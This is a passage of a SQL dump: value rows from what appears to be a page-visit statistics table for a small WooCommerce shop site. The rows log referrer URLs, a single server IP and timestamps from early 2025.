08:30:28'),(3150,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-01 15:00:28'),(3151,0,0,1,1775,1,'','3.110.242.160','','','','2025-01-01 15:07:04'),(3152,0,0,1,1786,1,'','3.110.242.160','','','','2025-01-01 15:11:49'),(3153,9,0,0,136,1,'','3.110.242.160','','','','2025-01-01 16:44:13'),(3154,9,0,0,85,1,'','3.110.242.160','','','','2025-01-01 16:44:15'),(3155,9,0,0,135,1,'','3.110.242.160','','','','2025-01-01 16:50:27'),(3156,1,0,0,0,1,'','3.110.242.160','','','','2025-01-01 17:05:04'),(3157,9,0,0,136,1,'','3.110.242.160','','','','2025-01-02 07:41:15'),(3158,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2025-01-02 18:00:15'),(3159,9,0,0,135,1,'','3.110.242.160','','','','2025-01-02 19:53:49'),(3160,1,0,0,0,1,'','3.110.242.160','','','','2025-01-03 02:24:56'),(3161,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2025-01-03 09:51:09'),(3162,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2025-01-03 13:58:59'),(3163,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2025-01-03 20:12:12'),(3164,9,0,0,135,1,'','3.110.242.160','','','','2025-01-04 05:23:51'),(3165,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-04 05:26:06'),(3166,0,0,1,1775,1,'','3.110.242.160','','','','2025-01-04 11:16:54'),(3167,0,0,1,1775,1,'','3.110.242.160','','','','2025-01-04 18:43:10'),(3168,1,0,0,0,1,'','3.110.242.160','','','','2025-01-05 04:44:36'),(3169,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-05 06:42:56'),(3170,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-07 02:22:31'),(3171,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-01-07 08:04:18'),(3172,1,0,0,0,1,'','3.110.242.160','','','','2025-01-07 14:38:04'),(3173,9,0,0,85,1,'','3.110.242.160','','','','2025-01-07 14:38:07'),(3174,0,0,1,1786,1,'','3.110.242.160','','','','2025-01-07 14:38:08'),(3175,1,0,0,0,1,'','3.110.242.160','','','','2025-01-07 14:38:15'),(3176,9,0,0,135,1,'','3.110.242.160','','','','2025-01-07 14:38:16'),(3177,9,0,0,135,1,'','3.110.242.160','','','','2025-01-07 14:38:20'),(3178,0,0,1,1775,1,'','3.110.242.160','','','','2025-01-07 14:38:23'),(3179,1,0,0,0,1,'','3.110.242.160','','','','2025-01-07 14:38:26'),(3180,9,0,0,136,1,'','3.110.242.160','','','','2025-01-07 14:38:31'),(3181,9,0,0,136,1,'','3.110.242.160','','','','2025-01-07 14:38:34'),(3182,9,0,0,136,1,'','3.110.242.160','','','','2025-01-07 14:38:35'),(3183,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-07 14:38:38'),(3184,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-07 14:38:42'),(3185,0,0,1,1775,1,'','3.110.242.160','','','','2025-01-08 22:00:08'),(3186,0,0,1,1786,1,'','3.110.242.160','','','','2025-01-08 22:10:50'),(3187,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-08 22:11:12'),(3188,9,0,0,136,1,'','3.110.242.160','','','','2025-01-09 01:05:27'),(3189,9,0,0,85,1,'','3.110.242.160','','','','2025-01-09 01:08:27'),(3190,9,0,0,135,1,'','3.110.242.160','','','','2025-01-09 01:24:29'),(3191,1,0,0,0,1,'','3.110.242.160','','','','2025-01-09 04:08:26'),(3192,0,0,1,1775,1,'','3.110.242.160','','','','2025-01-09 17:26:09'),(3193,9,0,0,135,1,'https://gopalak.in/login/?restricted=page','3.110.242.160','','','','2025-01-09 19:16:21'),(3194,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-11 18:45:02'),(3195,0,0,1,1775,1,'','3.110.242.160','','','','2025-01-11 18:46:01'),(3196,0,0,1,1786,1,'','3.110.242.160','','','','2025-01-11 18:47:03'),(3197,9,0,0,85,1,'','3.110.242.160','','','','2025-01-11 20:59:00'),(3198,9,0,0,136,1,'','3.110.242.160','','','','2025-01-11 21:00:50'),(3199,9,0,0,135,1,'','3.110.242.160','','','','2025-01-11 21:06:12'),(3200,1,0,0,0,1,'http://gopalak.in','3.110.242.160','','','','2025-01-12 06:43:14'),(3201,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-13 12:28:40'),(3202,1,0,0,0,1,'http://gopalak.in','3.110.242.160','','','','2025-01-14 10:13:11'),(3203,1,0,0,0,1,'http://gopalak.in','3.110.242.160','','','','2025-01-14 16:39:07'),(3204,0,0,1,1775,1,'','3.110.242.160','','','','2025-01-14 16:47:23'),(3205,1,0,0,0,1,'http://gopalak.in','3.110.242.160','','','','2025-01-14 20:59:38'),(3206,1,0,0,0,1,'','3.110.242.160','','','','2025-01-15 12:28:27'),(3207,0,0,1,1786,1,'','3.110.242.160','','','','2025-01-15 14:26:31'),(3208,0,0,1,1775,1,'','3.110.242.160','','','','2025-01-15 17:11:07'),(3209,9,0,0,135,1,'','3.110.242.160','','','','2025-01-15 18:04:19'),(3210,9,0,0,136,1,'','3.110.242.160','','','','2025-01-15 18:09:38'),(3211,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-15 18:40:29'),(3212,0,0,1,1786,1,'','3.110.242.160','','','','2025-01-15 20:15:07'),(3213,9,0,0,85,1,'','3.110.242.160','','','','2025-01-15 20:36:19'),(3214,9,0,0,136,1,'','3.110.242.160','','','','2025-01-15 23:04:11'),(3215,9,0,0,136,1,'','3.110.242.160','','','','2025-01-15 23:41:54'),(3216,1,0,0,0,1,'','3.110.242.160','','','','2025-01-16 00:28:55'),(3217,1,0,0,0,1,'','3.110.242.160','','','','2025-01-16 02:46:04'),(3218,1,0,0,0,1,'','3.110.242.160','','','','2025-01-16 03:52:17'),(3219,9,0,0,135,1,'','3.110.242.160','','','','2025-01-16 03:54:34'),(3220,0,0,1,1775,1,'','3.110.242.160','','','','2025-01-16 04:13:49'),(3221,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-16 04:47:47'),(3222,1,0,0,0,1,'','3.110.242.160','','','','2025-01-16 05:34:42'),(3223,9,0,0,136,1,'','3.110.242.160','','','','2025-01-16 05:34:49'),(3224,9,0,0,135,1,'','3.110.242.160','','','','2025-01-16 05:34:50'),(3225,9,0,0,85,1,'','3.110.242.160','','','','2025-01-16 05:34:51'),(3226,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-16 05:34:53'),(3227,0,0,1,1775,1,'','3.110.242.160','','','','2025-01-16 05:34:54'),(3228,0,0,1,1786,1,'','3.110.242.160','','','','2025-01-16 05:34:54'),(3229,0,0,1,1786,1,'','3.110.242.160','','','','2025-01-16 09:52:45'),(3230,1,0,0,0,1,'http://gopalak.in','3.110.242.160','','','','2025-01-16 11:38:57'),(3231,9,0,0,85,1,'','3.110.242.160','','','','2025-01-16 12:43:23'),(3232,9,0,0,135,1,'','3.110.242.160','','','','2025-01-16 12:43:26'),(3233,9,0,0,136,1,'','3.110.242.160','','','','2025-01-16 12:43:30'),(3234,0,0,1,1775,1,'','3.110.242.160','','','','2025-01-16 12:45:05'),(3235,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-16 12:45:09'),(3236,1,0,0,0,1,'','3.110.242.160','','','','2025-01-16 12:45:12'),(3237,1,0,0,0,1,'','3.110.242.160','','','','2025-01-16 12:45:14'),(3238,1,0,0,0,1,'','3.110.242.160','','','','2025-01-16 12:45:17'),(3239,9,0,0,135,1,'','3.110.242.160','','','','2025-01-16 12:49:19'),(3240,9,0,0,136,1,'','3.110.242.160','','','','2025-01-16 12:49:26'),(3241,9,0,0,136,1,'','3.110.242.160','','','','2025-01-16 12:49:30'),(3242,0,0,1,1775,1,'','3.110.242.160','','','','2025-01-16 12:50:29'),(3243,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-16 12:50:47'),(3244,0,0,1,1786,1,'','3.110.242.160','','','','2025-01-16 19:58:04'),(3245,1,0,0,0,1,'','3.110.242.160','','','','2025-01-17 06:05:11'),(3246,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-17 20:08:04'),(3247,0,0,1,1775,1,'','3.110.242.160','','','','2025-01-17 20:16:00'),(3248,0,0,1,1786,1,'','3.110.242.160','','','','2025-01-17 20:17:03'),(3249,9,0,0,136,1,'','3.110.242.160','','','','2025-01-17 22:25:13'),(3250,9,0,0,85,1,'','3.110.242.160','','','','2025-01-17 22:30:10'),(3251,9,0,0,135,1,'','3.110.242.160','','','','2025-01-17 22:33:12'),(3252,0,0,1,1786,1,'','3.110.242.160','','','','2025-01-18 06:16:44'),(3253,0,1,0,0,21,'','3.110.242.160','','','','2025-01-18 06:23:34'),(3254,1,0,0,0,1,'','3.110.242.160','','','','2025-01-18 06:37:52'),(3255,9,0,0,135,1,'','3.110.242.160','','','','2025-01-18 07:20:42'),(3256,0,0,1,1775,1,'','3.110.242.160','','','','2025-01-18 07:25:43'),(3257,9,0,0,136,1,'','3.110.242.160','','','','2025-01-18 07:26:56'),(3258,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-18 07:30:14'),(3259,1,0,0,0,1,'','3.110.242.160','','','','2025-01-18 14:03:14'),(3260,0,0,1,1786,1,'','3.110.242.160','','','','2025-01-18 14:26:17'),(3261,0,0,1,1786,1,'','3.110.242.160','','','','2025-01-20 13:00:44'),(3262,0,0,1,1775,1,'','3.110.242.160','','','','2025-01-20 13:00:58'),(3263,1,0,0,0,1,'','3.110.242.160','','','','2025-01-20 13:01:27'),(3264,9,0,0,85,1,'','3.110.242.160','','','','2025-01-20 13:01:59'),(3265,1,0,0,0,1,'','3.110.242.160','','','','2025-01-20 13:03:41'),(3266,1,0,0,0,1,'','3.110.242.160','','','','2025-01-20 13:03:56'),(3267,0,0,1,1775,1,'','3.110.242.160','','','','2025-01-20 13:04:13'),(3268,9,0,0,136,1,'','3.110.242.160','','','','2025-01-20 13:04:27'),(3269,1,0,0,0,1,'','3.110.242.160','','','','2025-01-20 13:04:43'),(3270,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-20 13:05:00'),(3271,9,0,0,136,1,'','3.110.242.160','','','','2025-01-20 13:05:14'),(3272,9,0,0,136,1,'','3.110.242.160','','','','2025-01-20 13:05:29'),(3273,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-20 13:06:10'),(3274,9,0,0,135,1,'','3.110.242.160','','','','2025-01-20 13:06:25'),(3275,9,0,0,135,1,'','3.110.242.160','','','','2025-01-20 13:06:42'),(3276,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-21 03:47:55'),(3277,9,0,0,136,1,'','3.110.242.160','','','','2025-01-21 15:53:16'),(3278,1,0,0,0,1,'','3.110.242.160','','','','2025-01-21 18:06:24'),(3279,1,0,0,0,1,'','3.110.242.160','','','','2025-01-22 04:12:11'),(3280,9,0,0,136,1,'','3.110.242.160','','','','2025-01-22 19:36:40'),(3281,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-23 07:28:34'),(3282,0,0,1,1786,1,'','3.110.242.160','','','','2025-01-23 07:29:37'),(3283,0,0,1,1786,1,'','3.110.242.160','','','','2025-01-23 17:06:59'),(3284,0,0,1,1775,1,'','3.110.242.160','','','','2025-01-24 16:04:11'),(3285,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-25 09:35:47'),(3286,0,0,1,1786,1,'','3.110.242.160','','','','2025-01-25 15:44:59'),(3287,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-01-26 05:31:21'),(3288,1,0,0,0,1,'http://gopalak.in','3.110.242.160','','','','2025-01-26 15:49:22'),(3289,0,0,1,1755,1,'https://gopalak.in/my-account/edit-account/','3.110.242.160','','','','2025-01-27 07:30:37'),(3290,9,0,0,135,1,'https://gopalak.in/my-account/edit-account/','3.110.242.160','','','','2025-01-27 07:30:51'),(3291,9,0,0,136,1,'https://gopalak.in/product-category/organic-fertilizer-repellent/','3.110.242.160','','','','2025-01-27 07:31:45'),(3292,0,0,1,1775,1,'https://gopalak.in/product-category/donation/','3.110.242.160','','','','2025-01-27 07:32:10'),(3293,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-01-27 07:33:31'),(3294,9,0,0,135,1,'','3.110.242.160','','','','2025-01-27 17:16:51'),(3295,1,0,0,0,1,'https://gopalak.in/shop','3.110.242.160','','','','2025-01-27 17:41:06'),(3296,0,0,1,1775,1,'https://gopalak.in/product/abc','3.110.242.160','','','','2025-01-28 03:37:40'),(3297,9,0,0,85,1,'https://gopalak.in/product-tag/pre-order','3.110.242.160','','','','2025-01-28 03:37:56'),(3298,9,0,0,136,1,'https://gopalak.in/product-category/donation','3.110.242.160','','','','2025-01-28 03:38:19'),(3299,9,0,0,135,1,'https://gopalak.in/product-category/organic-fertilizer-repellent','3.110.242.160','','','','2025-01-28 03:38:45'),(3300,0,0,1,1755,1,'https://gopalak.in/product/cow','3.110.242.160','','','','2025-01-28 03:39:10'),(3301,0,0,1,1786,1,'https://gopalak.in/product/cattle','3.110.242.160','','','','2025-01-28 03:43:26'),(3302,1,0,0,0,1,'','3.110.242.160','','','','2025-01-29 14:18:31'),(3303,9,0,0,85,1,'','3.110.242.160','','','','2025-01-29 14:18:34'),(3304,0,0,1,1786,1,'','3.110.242.160','','','','2025-01-29 14:18:35'),(3305,1,0,0,0,1,'','3.110.242.160','','','','2025-01-29 14:18:42'),(3306,9,0,0,135,1,'','3.110.242.160','','','','2025-01-29 14:18:43'),(3307,9,0,0,135,1,'','3.110.242.160','','','','2025-01-29 14:18:47'),(3308,0,0,1,1775,1,'','3.110.242.160','','','','2025-01-29 14:18:50'),(3309,1,0,0,0,1,'','3.110.242.160','','','','2025-01-29 14:18:53'),(3310,9,0,0,136,1,'','3.110.242.160','','','','2025-01-29 14:18:57'),(3311,9,0,0,136,1,'','3.110.242.160','','','','2025-01-29 14:19:00'),(3312,9,0,0,136,1,'','3.110.242.160','','','','2025-01-29 14:19:01'),(3313,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-29 14:19:05'),(3314,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-29 14:19:08'),(3315,1,0,0,0,1,'','3.110.242.160','','','','2025-01-30 14:36:58'),(3316,0,0,1,1775,1,'','3.110.242.160','','','','2025-01-30 15:07:54'),(3317,0,0,1,1786,1,'','3.110.242.160','','','','2025-01-31 06:20:16'),(3318,1,0,0,0,1,'','3.110.242.160','','','','2025-01-31 09:03:52'),(3319,0,0,1,1755,1,'','3.110.242.160','','','','2025-01-31 09:04:34'),(3320,0,0,1,1775,1,'','3.110.242.160','','','','2025-01-31 09:04:35'),(3321,9,0,0,135,1,'','3.110.242.160','','','','2025-01-31 09:04:37'),(3322,9,0,0,136,1,'','3.110.242.160','','','','2025-01-31 09:04:37'),(3323,9,0,0,85,1,'','3.110.242.160','','','','2025-02-02 19:10:37'),(3324,0,0,1,1786,1,'','3.110.242.160','','','','2025-02-03 06:17:00'),(3325,1,0,0,0,1,'','3.110.242.160','','','','2025-02-03 08:25:31'),(3326,9,0,0,136,1,'','3.110.242.160','','','','2025-02-03 08:26:13'),(3327,9,0,0,135,1,'','3.110.242.160','','','','2025-02-03 08:26:21'),(3328,0,0,1,1775,1,'','3.110.242.160','','','','2025-02-03 08:26:22'),(3329,1,0,0,0,1,'','3.110.242.160','','','','2025-02-03 21:01:47'),(3330,0,0,1,1786,1,'','3.110.242.160','','','','2025-02-04 01:51:39'),(3331,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2025-02-04 15:17:47'),(3332,0,0,1,1786,1,'','3.110.242.160','','','','2025-02-05 00:00:24'),(3333,0,1,0,0,21,'','3.110.242.160','','','','2025-02-05 04:46:11'),(3334,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-02-05 05:16:16'),(3335,9,0,0,136,1,'','3.110.242.160','','','','2025-02-05 10:20:50'),(3336,1,0,0,0,1,'','3.110.242.160','','','','2025-02-06 05:17:48'),(3337,0,0,1,1775,1,'','3.110.242.160','','','','2025-02-06 05:18:11'),(3338,0,0,1,1755,1,'','3.110.242.160','','','','2025-02-06 05:18:28'),(3339,0,0,1,1786,1,'','3.110.242.160','','','','2025-02-06 05:20:07'),(3340,1,0,0,0,1,'','3.110.242.160','','','','2025-02-06 05:21:15'),(3341,1,0,0,0,1,'','3.110.242.160','','','','2025-02-06 05:22:11'),(3342,1,0,0,0,1,'','3.110.242.160','','','','2025-02-06 05:22:14'),(3343,9,0,0,135,1,'','3.110.242.160','','','','2025-02-06 05:23:56'),(3344,9,0,0,135,1,'','3.110.242.160','','','','2025-02-06 05:24:20'),(3345,0,0,1,1775,1,'','3.110.242.160','','','','2025-02-06 05:24:45'),(3346,0,0,1,1755,1,'','3.110.242.160','','','','2025-02-06 05:24:47'),(3347,9,0,0,136,1,'','3.110.242.160','','','','2025-02-06 05:24:51'),(3348,9,0,0,85,1,'','3.110.242.160','','','','2025-02-06 05:25:12'),(3349,9,0,0,136,1,'','3.110.242.160','','','','2025-02-06 05:25:23'),(3350,9,0,0,136,1,'','3.110.242.160','','','','2025-02-06 05:25:25'),(3351,1,0,0,0,1,'','3.110.242.160','','','','2025-02-07 08:23:49'),(3352,1,0,0,0,1,'','3.110.242.160','','','','2025-02-07 16:33:13'),(3353,9,0,0,135,1,'','3.110.242.160','','','','2025-02-08 03:12:26'),(3354,9,0,0,136,1,'','3.110.242.160','','','','2025-02-08 05:41:50'),(3355,1,0,0,0,1,'','3.110.242.160','','','','2025-02-08 05:56:22'),(3356,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2025-02-08 17:09:19'),(3357,1,0,0,0,1,'','3.110.242.160','','','','2025-02-10 01:02:19'),(3358,9,0,0,85,1,'','3.110.242.160','','','','2025-02-10 03:23:51'),(3359,0,0,1,1786,1,'','3.110.242.160','','','','2025-02-10 05:16:19'),(3360,0,0,1,1775,1,'','3.110.242.160','','','','2025-02-10 05:29:42'),(3361,0,0,1,1755,1,'','3.110.242.160','','','','2025-02-10 12:35:37'),(3362,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2025-02-10 19:05:58'),(3363,0,0,1,1755,1,'','3.110.242.160','','','','2025-02-11 00:30:45'),(3364,0,0,1,1775,1,'','3.110.242.160','','','','2025-02-11 23:08:38'),(3365,0,0,1,1786,1,'','3.110.242.160','','','','2025-02-12 05:47:41'),(3366,1,0,0,0,1,'','3.110.242.160','','','','2025-02-12 07:28:29'),(3367,0,0,1,1775,1,'','3.110.242.160','','','','2025-02-12 07:29:26'),(3368,0,0,1,1755,1,'','3.110.242.160','','','','2025-02-12 07:29:36'),(3369,1,0,0,0,1,'','3.110.242.160','','','','2025-02-12 07:42:48'),(3370,1,0,0,0,1,'','3.110.242.160','','','','2025-02-12 07:46:40'),(3371,1,0,0,0,1,'','3.110.242.160','','','','2025-02-12 07:46:48'),(3372,9,0,0,135,1,'','3.110.242.160','','','','2025-02-12 07:53:49'),(3373,9,0,0,135,1,'','3.110.242.160','','','','2025-02-12 07:55:21'),(3374,0,0,1,1755,1,'','3.110.242.160','','','','2025-02-12 07:59:29'),(3375,0,0,1,1775,1,'','3.110.242.160','','','','2025-02-12 07:59:38'),(3376,9,0,0,136,1,'','3.110.242.160','','','','2025-02-12 07:59:52'),(3377,9,0,0,136,1,'','3.110.242.160','','','','2025-02-12 08:01:03'),(3378,9,0,0,136,1,'','3.110.242.160','','','','2025-02-12 08:01:12'),(3379,9,0,0,85,1,'','3.110.242.160','','','','2025-02-12 08:01:29'),(3380,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2025-02-12 15:59:45'),(3381,1,0,0,0,1,'','3.110.242.160','','','','2025-02-12 20:44:00'),(3382,1,0,0,0,1,'','3.110.242.160','','','','2025-02-13 13:27:47'),(3383,0,0,1,1755,1,'','3.110.242.160','','','','2025-02-13 20:02:40'),(3384,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2025-02-13 22:55:46'),(3385,0,0,1,1755,1,'','3.110.242.160','','','','2025-02-14 10:01:34'),(3386,0,0,1,1755,1,'','3.110.242.160','','','','2025-02-14 22:21:40'),(3387,9,0,0,136,1,'','3.110.242.160','','','','2025-02-15 04:01:11'),(3388,1,0,0,0,1,'','3.110.242.160','','','','2025-02-15 09:58:08'),(3389,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-02-15 15:49:56'),(3390,0,0,1,1775,1,'','3.110.242.160','','','','2025-02-15 22:24:44'),(3391,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-02-16 04:11:42'),(3392,0,0,1,1755,1,'','3.110.242.160','','','','2025-02-16 08:56:49'),(3393,9,0,0,136,1,'','3.110.242.160','','','','2025-02-17 13:49:44'),(3394,1,0,0,0,1,'','3.110.242.160','','','','2025-02-17 14:17:07'),(3395,1,0,0,0,1,'','3.110.242.160','','','','2025-02-17 21:29:45'),(3396,1,0,0,0,1,'','3.110.242.160','','','','2025-02-20 02:39:54'),(3397,1,0,0,0,1,'','3.110.242.160','','','','2025-02-21 14:12:25'),(3398,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-02-23 05:37:33'),(3399,0,0,1,1786,1,'','3.110.242.160','','','','2025-02-23 12:52:40'),(3400,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-02-24 04:33:46'),(3401,1,0,0,0,1,'','3.110.242.160','','','','2025-02-24 08:38:13'),(3402,0,0,1,1786,1,'','3.110.242.160','','','','2025-02-24 10:10:37'),(3403,0,0,1,1755,1,'','3.110.242.160','','','','2025-02-24 10:10:37'),(3404,1,0,0,0,1,'','3.110.242.160','','','','2025-02-24 10:10:38'),(3405,0,0,1,1755,1,'','3.110.242.160','','','','2025-02-25 03:55:33'),(3406,1,0,0,0,1,'','3.110.242.160','','','','2025-02-25 08:29:09'),(3407,1,0,0,0,1,'','3.110.242.160','','','','2025-02-25 16:37:06'),(3408,1,0,0,0,1,'','3.110.242.160','','','','2025-02-26 04:50:21'),(3409,0,0,1,1755,1,'','3.110.242.160','','','','2025-02-26 05:31:49'),(3410,0,0,1,1775,1,'','3.110.242.160','','','','2025-02-26 05:36:18'),(3411,0,0,1,1786,1,'','3.110.242.160','','','','2025-02-26 05:45:56'),(3412,1,0,0,0,1,'','3.110.242.160','','','','2025-02-26 05:54:35'),(3413,1,0,0,0,1,'','3.110.242.160','','','','2025-02-26 06:01:33'),(3414,1,0,0,0,1,'','3.110.242.160','','','','2025-02-26 06:01:48'),(3415,9,0,0,135,1,'','3.110.242.160','','','','2025-02-26 06:09:47'),(3416,9,0,0,135,1,'','3.110.242.160','','','','2025-02-26 06:12:30'),(3417,0,0,1,1755,1,'','3.110.242.160','','','','2025-02-26 06:15:27'),(3418,0,0,1,1775,1,'','3.110.242.160','','','','2025-02-26 06:15:40'),(3419,9,0,0,136,1,'','3.110.242.160','','','','2025-02-26 06:16:04'),(3420,9,0,0,85,1,'','3.110.242.160','','','','2025-02-26 06:16:42'),(3421,9,0,0,136,1,'','3.110.242.160','','','','2025-02-26 06:18:54'),(3422,9,0,0,136,1,'','3.110.242.160','','','','2025-02-26 06:19:31'),(3423,0,0,1,1755,1,'','3.110.242.160','','','','2025-02-27 19:47:49'),(3424,1,0,0,0,1,'','3.110.242.160','','','','2025-02-28 03:44:01'),(3425,1,0,0,0,1,'','3.110.242.160','','','','2025-02-28 15:25:41'),(3426,0,0,1,1786,1,'','3.110.242.160','','','','2025-03-01 15:56:22'),(3427,0,0,1,1775,1,'','3.110.242.160','','','','2025-03-02 00:03:22'),(3428,9,0,0,85,1,'','3.110.242.160','','','','2025-03-02 20:17:43'),(3429,9,0,0,136,1,'','3.110.242.160','','','','2025-03-03 20:07:55'),(3430,0,0,1,1775,1,'','3.110.242.160','','','','2025-03-04 06:17:24'),(3431,0,0,1,1775,1,'','3.110.242.160','','','','2025-03-04 09:26:09'),(3432,9,0,0,136,1,'','3.110.242.160','','','','2025-03-04 22:15:03'),(3433,1,0,0,0,1,'http://gopalak.in/','3.110.242.160','','','','2025-03-05 08:36:00'),(3434,9,0,0,135,1,'','3.110.242.160','','','','2025-03-05 22:34:09'),(3435,0,0,1,1755,1,'','3.110.242.160','','','','2025-03-05 22:35:19'),(3436,0,0,1,1775,1,'','3.110.242.160','','','','2025-03-05 22:39:58'),(3437,0,0,1,1786,1,'','3.110.242.160','','','','2025-03-05 22:40:48'),(3438,1,0,0,0,1,'','3.110.242.160','','','','2025-03-05 22:42:20'),(3439,0,1,0,0,21,'','3.110.242.160','','','','2025-03-05 22:43:58'),(3440,9,0,0,136,1,'','3.110.242.160','','','','2025-03-05 22:44:38'),(3441,9,0,0,85,1,'','3.110.242.160','','','','2025-03-05 22:46:28'),(3442,1,0,0,0,1,'http://gopalak.in','3.110.242.160','','','','2025-03-06 04:57:29'),(3443,9,0,0,136,1,'','3.110.242.160','','','','2025-03-06 21:31:34'),(3444,1,0,0,0,1,'','3.110.242.160','','','','2025-03-07 03:51:24'),(3445,9,0,0,135,1,'','3.110.242.160','','','','2025-03-07 08:32:32'),(3446,9,0,0,136,1,'','3.110.242.160','','','','2025-03-07 16:20:57'),(3447,9,0,0,136,1,'','3.110.242.160','','','','2025-03-08 18:55:44'),(3448,1,0,0,0,1,'','3.110.242.160','','','','2025-03-09 22:47:47'),(3449,1,0,0,0,1,'','3.110.242.160','','','','2025-03-10 08:45:24'),(3450,0,1,0,0,21,'','3.110.242.160','','','','2025-03-11 19:54:26'),(3451,1,0,0,0,1,'','3.110.242.160','','','','2025-03-13 00:38:26'),(3452,9,0,0,135,1,'https://gopalak.in/shop/','3.110.242.160','','','','2025-03-13 03:26:52'),(3453,0,0,1,1786,1,'https://gopalak.in/product-category/organic-fertilizer-repellent/','3.110.242.160','','','','2025-03-13 03:26:59'),(3454,9,0,0,136,1,'https://gopalak.in/product/cattle/','3.110.242.160','','','','2025-03-13 03:27:12'),(3455,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-03-13 12:39:13'),(3456,0,0,1,1786,1,'','3.110.242.160','','','','2025-03-13 19:02:26'),(3457,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-03-14 11:47:36'),(3458,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-03-15 12:02:50'),(3459,0,0,1,1775,1,'','3.110.242.160','','','','2025-03-15 12:24:54'),(3460,1,0,0,0,1,'http://gopalak.in','3.110.242.160','','','','2025-03-15 23:21:36'),(3461,0,0,1,1755,1,'','3.110.242.160','','','','2025-03-18 00:23:56'),(3462,1,0,0,0,1,'','3.110.242.160','','','','2025-03-19 08:20:46'),(3463,9,0,0,136,1,'','3.110.242.160','','','','2025-03-19 08:40:02'),(3464,0,0,1,1775,1,'','3.110.242.160','','','','2025-03-19 09:18:51'),(3465,1,0,0,0,1,'','3.110.242.160','','','','2025-03-19 12:44:48'),(3466,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-03-20 11:16:56'),(3467,9,0,0,15,1,'','3.110.242.160','','','','2025-03-20 15:11:48'),(3468,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-03-20 17:07:25'),(3469,0,0,1,1755,1,'https://gopalak.in/cart/','3.110.242.160','','','','2025-03-20 18:17:50'),(3470,0,0,1,1775,1,'https://gopalak.in/cart/','3.110.242.160','','','','2025-03-20 18:17:51'),(3471,0,0,1,1786,1,'https://gopalak.in/cart/','3.110.242.160','','','','2025-03-20 18:17:52'),(3472,9,0,0,135,1,'https://gopalak.in/cart/','3.110.242.160','','','','2025-03-20 18:17:52'),(3473,9,0,0,136,1,'https://gopalak.in/cart/','3.110.242.160','','','','2025-03-20 18:17:53'),(3474,9,0,0,85,1,'https://gopalak.in/vendor-register/','3.110.242.160','','','','2025-03-20 18:17:55'),(3475,1,0,0,0,1,'https://gopalak.in/shop/','3.110.242.160','','','','2025-03-20 18:17:57'),(3476,1,0,0,0,1,'https://gopalak.in/shop/','3.110.242.160','','','','2025-03-20 18:17:58'),(3477,1,0,0,0,1,'https://gopalak.in/shop/','3.110.242.160','','','','2025-03-20 18:17:59'),(3478,0,0,1,1755,1,'https://gopalak.in/product/cow/','3.110.242.160','','','','2025-03-20 18:18:00'),(3479,0,0,1,1775,1,'https://gopalak.in/product/abc/','3.110.242.160','','','','2025-03-20 18:18:00'),(3480,9,0,0,135,1,'https://gopalak.in/product-category/organic-fertilizer-repellent/','3.110.242.160','','','','2025-03-20 18:18:01'),(3481,9,0,0,136,1,'https://gopalak.in/product-category/donation/','3.110.242.160','','','','2025-03-20 18:18:02'),(3482,9,0,0,136,1,'https://gopalak.in/product-category/donation/','3.110.242.160','','','','2025-03-20 18:18:03'),(3483,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-03-21 13:33:23'),(3484,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-03-21 18:35:17'),(3485,0,0,1,1755,1,'','3.110.242.160','','','','2025-03-22 13:17:39'),(3486,0,0,1,1786,1,'','3.110.242.160','','','','2025-03-22 14:11:21'),(3487,0,0,1,1775,1,'','3.110.242.160','','','','2025-03-22 15:36:24'),(3488,9,0,0,136,1,'','3.110.242.160','','','','2025-03-22 20:41:38'),(3489,0,0,1,1775,1,'','3.110.242.160','','','','2025-03-22 21:06:27'),(3490,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2025-03-23 13:42:16'),(3491,9,0,0,85,1,'','3.110.242.160','','','','2025-03-24 03:42:27'),(3492,1,0,0,0,1,'http://gopalak.in','3.110.242.160','','','','2025-03-24 